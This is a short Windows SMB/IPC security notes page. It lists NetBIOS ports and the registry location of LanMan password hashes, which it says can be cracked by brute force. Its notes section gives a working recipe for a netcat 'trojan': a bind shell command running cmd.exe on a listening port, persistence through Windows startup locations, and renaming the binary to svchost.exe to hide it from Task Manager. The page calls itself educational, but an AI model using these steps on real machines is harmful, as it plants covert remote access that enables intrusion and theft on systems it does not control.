Windows IPC / SMB / ETC

This document is a list of Windows vulnerability documents and links to applications commonly used to evaluate Windows based networks for security problems. The information within and links to tools are for security evaluation and educational use. Any damage and liability caused to any party due to the misuse of these resource are disclaimed.

SMB

SMB
IPC$

NetBIOS Ports: 137-139,445

NetBIOS LanMan passwords can be found in the registry at
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan. They are hashed
but can be cracked via brute force engines.

Notes:

You can use netcat to create a trojan on Windows machines. Make netcat
emulate the Telnet negotiation by invoking the -t option. Use the -l
option to invoke the listen mode, use -p port# to specify a port to
bind, and finally -e command to specify the command to run once invoked
via incoming telnet connection to port#. This can be run from the command
line or put into one of windows startup locations. You may also change the
name of nc.exe and its internal id strings to svchost.exe to make it less
obvious in taskmanager.

	c:\>nc.exe -t -l -p 999 -e cmd.exe